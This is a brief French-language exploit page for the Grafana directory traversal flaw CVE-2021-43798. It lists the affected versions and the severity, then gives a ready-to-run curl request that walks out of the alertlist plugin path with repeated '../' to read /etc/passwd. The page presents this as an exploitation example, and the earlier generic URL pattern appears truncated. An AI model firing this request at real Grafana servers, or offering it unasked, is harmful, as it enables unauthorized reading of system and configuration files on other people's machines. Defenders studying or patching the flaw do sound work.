
Exploit pour la traversée de répertoire de Grafana (CVE-2021-43798) permettant la lecture non autorisée de fichiers via des requêtes HTTP spécialement conçues.
Versions affectées : Grafana 8.0.0-beta1 à 8.3.0 (à l'exception des versions corrigées)
Type de vulnérabilité : Directory Traversal (Parcours de répertoire)
Niveau de gravité : Critique (Critical)
Plateforme : Grafana (plateforme open-source de monitoring et d'observabilité)
⚠️ Détails de la vulnérabilité Dans Grafana, une traversée de répertoire peut être effectuée via l'URL suivante :
Code http://<grafana_host>/public/plugins//
Grâce à cela, un attaquant peut lire des fichiers locaux sur le serveur. Par exemple, /etc/passwd ou accéder sans autorisation à des fichiers de configuration.
🔥 Exemple d'exploitation Lecture d'un fichier via une simple requête :
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
La requête ci-dessus permet d'obtenir la liste des utilisateurs du système Linux.